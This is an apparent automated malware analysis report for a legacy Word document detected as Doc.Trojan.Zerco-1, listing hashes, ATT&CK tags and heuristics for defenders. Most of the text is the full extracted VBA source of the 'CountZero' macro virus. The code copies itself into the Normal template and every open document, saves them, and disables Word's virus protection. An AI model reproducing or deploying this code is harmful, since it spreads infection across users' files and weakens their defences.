Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 058d1cc4f2917b14…

MALICIOUS

Office (OLE)

31.0 KB Created: 2001-08-26 08:48:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: af9712284f8f03f059936013308904dd SHA-1: 22a7c65f81c3ef8a2511be01a124ebe3116461e2 SHA-256: 058d1cc4f2917b14ce8b84603df0ae42b0390223cff6ffcf3172d37f56c64577
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Zerco-1. It contains a legacy WordBasic AutoOpen macro and other VBA macros, indicating an attempt to execute arbitrary code upon opening. The AutoOpen macro appears to be designed to copy itself to the Normal template, potentially for persistence or to ensure execution on subsequent document openings.

Heuristics 4

  • ClamAV: Doc.Trojan.Zerco-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zerco-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3554 bytes
SHA-256: 698bda84207d106fbfb8028251907bc3a2ba15d227695fab002440ae1535759a
Detection
ClamAV: Doc.Trojan.Zerco-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "CountZero"
Sub AutoOpen()
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
Dim cdoc As Document
Dim vbiref As Reference
On Error Resume Next
If ThisDocument.Name <> NormalTemplate.Name Then
    Set vbc = NormalTemplate.VBProject.VBComponents("CountZero")
    If Err <> 0 Then
        For Each vbiref In ThisDocument.VBProject.References
        If vbiref.Name = "VBIDE" Then
            Exit For
        End If
        Next
        Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
        vbc.Name = "CountZero"
        Set cm = vbc.CodeModule
        Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
        cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
        NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
    Else
        Set cm = vbc.CodeModule
        Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
        If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
            For Each vbiref In ThisDocument.VBProject.References
                If vbiref.Name = "VBIDE" Then
                    Exit For
                End If
            Next
            Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
            vbc.Name = "CountZero"
            Set cm = vbc.CodeModule
            Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
            cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
            NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
        End If
    End If
End If
For Each cdoc In Documents
    Clone cdoc
    cdoc.Save
Next

Options.VirusProtection = False
Application.Activate
On Error GoTo 0
End Sub
Sub Clone(ByRef dest As Document)
Dim vbiref As Reference
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
On Error Resume Next
For Each vbiref In ThisDocument.VBProject.References
    If vbiref.Name = "VBIDE" Then
        Exit For
    End If
Next
Set vbc = dest.VBProject.VBComponents("CountZero")
If Err <> 0 Then
    Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
    vbc.Name = "CountZero"
    Set cm = vbc.CodeModule
    Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
    cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
    dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
Else
    Set cm = vbc.CodeModule
    Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
    If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
        Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
        vbc.Name = "CountZero"
        Set cm = vbc.CodeModule
        Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
        cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
        dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
    End If
End If
End Sub
Sub AutoNew()
Dim adoc As Document
    If ThisDocument.Name = NormalTemplate.Name Then
        For Each adoc In Documents
            Clone adoc
        Next
        Application.Activate
    End If
End Sub